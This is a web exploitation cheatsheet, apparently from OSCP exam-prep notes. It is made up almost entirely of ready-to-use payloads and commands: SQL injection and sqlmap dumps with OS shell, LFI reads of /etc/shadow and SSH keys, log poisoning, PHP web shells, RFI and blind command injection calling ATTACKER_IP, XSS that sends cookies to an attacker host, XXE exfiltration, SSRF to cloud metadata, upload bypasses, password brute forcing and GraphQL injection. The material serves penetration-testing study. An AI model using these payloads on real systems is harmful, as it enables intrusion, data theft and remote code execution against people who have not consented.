// notes/ Web Exploitation
🕸️

Web Exploitation Cheatsheet

SQLi, XSS, LFI/RFI, SSRF, IDOR, deserialization, and common web payloads.

#web#owasp#cheatsheet
source · airouboss/oscp-prep-notes-2026 · cheat-sheets/web-exploitation.md

Web Exploitation

Dir-Enum

Gobuster

bash
$# Directory enumeration
$gobuster dir -u http://TARGET -w /usr/share/wordlists/dirb/common.txt
$
$# With file extensions
$gobuster dir -u http://TARGET -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,bak
$
$# DNS subdomain enumeration
$gobuster dns -d TARGET.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
$
$# VHost enumeration
$gobuster vhost -u http://TARGET -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
$
$# Useful options
$-k : Skip SSL verification
$-t : Number of threads (default 10)
$-o : Output file
$-b : Exclude status codes
$-s : Show only these status codes

Ffuf

bash
$# Directory fuzzing
$ffuf -u http://TARGET/FUZZ -w /usr/share/wordlists/dirb/common.txt
$
$# File extension fuzzing
$ffuf -u http://TARGET/index.FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions.txt
$
$# VHost fuzzing
$ffuf -u http://TARGET -H "Host: FUZZ.TARGET.com" -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -fs 1234
$
$# POST data fuzzing
$ffuf -u http://TARGET/login.php -X POST -d "username=admin&password=FUZZ" -w /usr/share/wordlists/rockyou.txt -fc 401
$
$# Useful options
$-mc : Match status codes
$-fc : Filter status codes
$-fs : Filter response size
$-fw : Filter word count
$-ms : Match response size
$-t : Threads (default 40)
$-r : Follow redirects

Dirsearch

bash
$# Basic scan
$dirsearch -u http://TARGET
$
$# With extensions
$dirsearch -u http://TARGET -e php,html,txt
$
$# Custom wordlist
$dirsearch -u http://TARGET -w /path/to/wordlist.txt
$
$# Recursive
$dirsearch -u http://TARGET -r

Common Wordlists

bash
$# Directories
$/usr/share/wordlists/dirb/common.txt
$/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
$/usr/share/seclists/Discovery/Web-Content/common.txt
$/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
$
$# Subdomains
$/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt

SQLi

Detection

bash
$# Simple tests
$' OR '1'='1
$' OR '1'='1'--
$' OR '1'='1'#
$' OR '1'='1'/*
$admin' --
$admin' #

Manual Enumeration

sql
01# Determine number of columns
02' ORDER BY 1--
03' ORDER BY 2--
04' ORDER BY 3--
05
06# Find injectable columns
07' UNION SELECT NULL,NULL,NULL--
08' UNION SELECT 1,2,3--
09
10# Database enumeration (MySQL)
11' UNION SELECT 1,schema_name,3 FROM information_schema.schemata--
12' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database()--
13' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--
14' UNION SELECT 1,username,password FROM users--
15
16# Database enumeration (MSSQL)
17' UNION SELECT 1,name,3 FROM master..sysdatabases--
18' UNION SELECT 1,name,3 FROM sysobjects WHERE xtype='U'--

SQLMap

bash
$# Basic scan
$sqlmap -u "http://TARGET/page.php?id=1"
$
$# With authentication
$sqlmap -u "http://TARGET/page.php?id=1" --cookie="PHPSESSID=abc123"
$
$# POST request
$sqlmap -u "http://TARGET/login.php" --data="username=admin&password=pass"
$
$# Enumerate databases
$sqlmap -u "http://TARGET/page.php?id=1" --dbs
$
$# Enumerate tables
$sqlmap -u "http://TARGET/page.php?id=1" -D database_name --tables
$
$# Dump data
$sqlmap -u "http://TARGET/page.php?id=1" -D database_name -T users --dump
$
$# OS shell (if possible)
$sqlmap -u "http://TARGET/page.php?id=1" --os-shell
$
$# Tamper scripts for WAF bypass
$sqlmap -u "http://TARGET/page.php?id=1" --tamper=space2comment

LFI-RFI

Local File Inclusion (LFI)

Basic LFI

bash
$# Linux
$http://TARGET/page.php?file=../../../../etc/passwd
$http://TARGET/page.php?file=../../../../etc/shadow
$http://TARGET/page.php?file=../../../../home/user/.ssh/id_rsa
$http://TARGET/page.php?file=../../../../var/log/apache2/access.log
$
$# Windows
$http://TARGET/page.php?file=../../../../windows/system32/drivers/etc/hosts
$http://TARGET/page.php?file=../../../../windows/win.ini
$http://TARGET/page.php?file=../../../../xampp/apache/logs/access.log

Bypass Techniques

bash
$# Null byte (PHP < 5.3.4)
$http://TARGET/page.php?file=../../../../etc/passwd%00
$
$# Double encoding
$http://TARGET/page.php?file=..%252f..%252f..%252fetc%252fpasswd
$
$# Path truncation
$http://TARGET/page.php?file=../../../../etc/passwd............................
$
$# Filter bypass
$http://TARGET/page.php?file=....//....//....//etc/passwd

Log Poisoning

bash
$# Poison Apache logs via User-Agent
$curl -A "<?php system(\$_GET['cmd']); ?>" http://TARGET/
$
$# Then access log with command
$http://TARGET/page.php?file=../../../../var/log/apache2/access.log&cmd=id
$
$# SSH log poisoning
$ssh '<?php system($_GET["cmd"]); ?>'@TARGET
$http://TARGET/page.php?file=../../../../var/log/auth.log&cmd=id

PHP Wrappers

bash
$# Read PHP source code (base64)
$http://TARGET/page.php?file=php://filter/convert.base64-encode/resource=index.php
$
$# Command execution
$http://TARGET/page.php?file=data://text/plain,<?php system($_GET['cmd']); ?>&cmd=id
$http://TARGET/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2b&cmd=id
$
$# expect wrapper (if enabled)
$http://TARGET/page.php?file=expect://id

Remote File Inclusion (RFI)

bash
$# Basic RFI
$http://TARGET/page.php?file=http://ATTACKER_IP/shell.txt
$
$# Create malicious file
$echo '<?php system($_GET["cmd"]); ?>' > shell.txt
$python3 -m http.server 80
$
$# Execute
$http://TARGET/page.php?file=http://ATTACKER_IP/shell.txt&cmd=id

Command-Injection

Detection

bash
$# Linux
$; id
$| id
$|| id
$& id
$&& id
$`id`
$$(id)
$
$# Windows
$& whoami
$&& whoami
$| whoami
$|| whoami

Blind Command Injection

bash
$# Time-based detection
$; sleep 10
$| sleep 10
$& ping -c 10 127.0.0.1
$
$# Out-of-band (DNS/HTTP)
$; nslookup $(whoami).ATTACKER_DOMAIN
$; curl http://ATTACKER_IP/$(whoami)

Bypass Techniques

bash
$# Use variables
$cat${IFS}/etc/passwd
$cat</etc/passwd
${cat,/etc/passwd}
$
$# Hex encoding
$$(echo -e "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64")
$
$# Base64 encoding
$echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | bash

XSS

Reflected XSS

html
01<script>alert(document.cookie)</script>
02<img src=x onerror=alert(document.cookie)>
03<svg onload=alert(document.cookie)>
04<iframe src="javascript:alert(document.cookie)">

Stored XSS

html
01<!-- Cookie stealing -->
02<script>
03fetch('http://ATTACKER_IP/?cookie=' + document.cookie);
04</script>
05
06<!-- Redirect to attacker site -->
07<script>
08window.location='http://ATTACKER_IP/?cookie=' + document.cookie;
09</script>

XSS Bypass

html
01# Uppercase/lowercase
02<ScRiPt>alert(1)</sCrIpT>
03
04# Without script tag
05<img src=x onerror=alert(1)>
06<body onload=alert(1)>
07
08# Encoding
09<script>alert(String.fromCharCode(88,83,83))</script>

XXE-SSRF

XML External Entity (XXE)

Basic XXE

xml
01<?xml version="1.0"?>
02<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
03<root>&test;</root>

Blind XXE (Out-of-band)

xml
01<?xml version="1.0"?>
02<!DOCTYPE root [<!ENTITY % remote SYSTEM 'http://ATTACKER_IP/evil.dtd'>%remote;]>
03<root></root>

evil.dtd:

xml
01<!ENTITY % file SYSTEM "file:///etc/passwd">
02<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKER_IP/?x=%file;'>">
03%eval;
04%exfil;

Server-Side Request Forgery (SSRF)

Basic SSRF

bash
$# Access internal services
$http://TARGET/fetch?url=http://127.0.0.1:80
$http://TARGET/fetch?url=http://localhost:22
$http://TARGET/fetch?url=http://169.254.169.254/latest/meta-data/
$
$# File access
$http://TARGET/fetch?url=file:///etc/passwd

Bypass Techniques

bash
$# Different encodings
$http://TARGET/fetch?url=http://0x7f.0x0.0x0.0x1
$http://TARGET/fetch?url=http://2130706433 # Decimal for 127.0.0.1
$http://TARGET/fetch?url=http://127.1
$
$# DNS rebinding
$http://TARGET/fetch?url=http://localtest.me

File-Upload

Bypass File Type Restrictions

bash
$# Double extensions
$shell.php.jpg
$shell.jpg.php
$
$# Null byte
$shell.php%00.jpg
$
$# Magic bytes
$GIF89a; <?php system($_GET['cmd']); ?>
$
$# Content-Type manipulation
$Change Content-Type to image/jpeg while uploading PHP shell
$
$# Case sensitivity
$shell.PhP
$shell.pHp

Web Shells

Simple PHP Shell

php
01<?php system($_GET['cmd']); ?>

More Advanced

php
01<?php
02if(isset($_REQUEST['cmd'])){
03 echo "<pre>";
04 $cmd = ($_REQUEST['cmd']);
05 system($cmd);
06 echo "</pre>";
07}
08?>

CMS-Enum

WordPress

WPScan

bash
$# Basic scan
$wpscan --url http://TARGET
$
$# Enumerate users
$wpscan --url http://TARGET --enumerate u
$
$# Enumerate plugins
$wpscan --url http://TARGET --enumerate p
$
$# Enumerate themes
$wpscan --url http://TARGET --enumerate t
$
$# Enumerate vulnerable plugins (requires API token)
$wpscan --url http://TARGET --enumerate vp --api-token YOUR_TOKEN
$
$# Aggressive scan
$wpscan --url http://TARGET --enumerate ap,at,u --plugins-detection aggressive
$
$# Password brute force
$wpscan --url http://TARGET --usernames admin --passwords /usr/share/wordlists/rockyou.txt

Manual Enumeration

bash
$# Check WordPress version
$curl http://TARGET/ | grep 'content="WordPress'
$
$# User enumeration
$http://TARGET/?author=1
$http://TARGET/wp-json/wp/v2/users
$
$# xmlrpc.php exploitation
$curl -X POST -d "<methodCall><methodName>system.listMethods</methodName></methodCall>" http://TARGET/xmlrpc.php

GraphQL

Introspection

graphql
01# Full schema
02{ __schema { types { name fields { name type { name kind } } } } }
03
04# Query type fields
05{ __schema { queryType { fields { name description } } } }
06
07# Specific type
08{ __type(name: "User") { name fields { name type { name } } } }

Basic Queries & Mutations

graphql
01# Query with arguments
02{ user(id: "1") { username email role } }
03
04# Nested query
05{ user(id: "1") { username posts { title content } } }
06
07# Mutation - create/update
08mutation { createUser(username: "admin", password: "pass123") { id username } }
09mutation { updateUser(id: "1", role: "admin") { id role } }

Auth Bypass

graphql
01# Try unauthenticated
02{"query": "{ users { id username email } }"}
03
04# SQL injection in argument
05{ user(id: "1' OR '1'='1") { username password } }
06
07# NoSQL injection
08{ login(username: {$ne: ""}, password: {$ne: ""}) { token } }
09
10# Parameter tampering
11mutation { updateUser(id: "1", role: "admin", isAdmin: true) { username role } }

Injection Testing

graphql
01# Command injection
02mutation { ping(host: "127.0.0.1; cat /etc/passwd") { result } }
03
04# Path traversal
05{ file(path: "../../../../etc/passwd") { content } }
06
07# SSTI
08mutation { render(input: "{{config.items()}}") { output } }

Bypassing Disabled Introspection

graphql
01# Field suggestions via typos reveal field names
02{ __schema { types { nam } } }
03
04# Partial introspection
05{ __type(name: "Query") { fields { name } } }
06{ __type(name: "User") { fields { name } } }
07{ __type(name: "Admin") { fields { name } } }
08
09# Clairvoyance (wordlist-based schema recovery)
10python3 -m clairvoyance -u http://TARGET/graphql -o schema.json

Tools

bash
$# Introspection via curl
$curl -X POST http://TARGET/graphql \
$ -H "Content-Type: application/json" \
$ -d '{"query": "{ __schema { types { name } } }"}'
$
$# get-graphql-schema
$get-graphql-schema http://TARGET/graphql > schema.graphql
$
$# GraphQLmap
$python3 graphqlmap.py -u http://TARGET/graphql
$
$# InQL (Burp Suite extension) - https://github.com/doyensec/inql
$# GraphQL Voyager (schema visualizer) - https://github.com/APIs-guru/graphql-voyager
$
$# SQLMap against GraphQL
$sqlmap -u "http://TARGET/graphql" \
$ --data='{"query":"{ user(id:\"INJECT_HERE\") { username } }"}' \
$ --headers="Content-Type: application/json"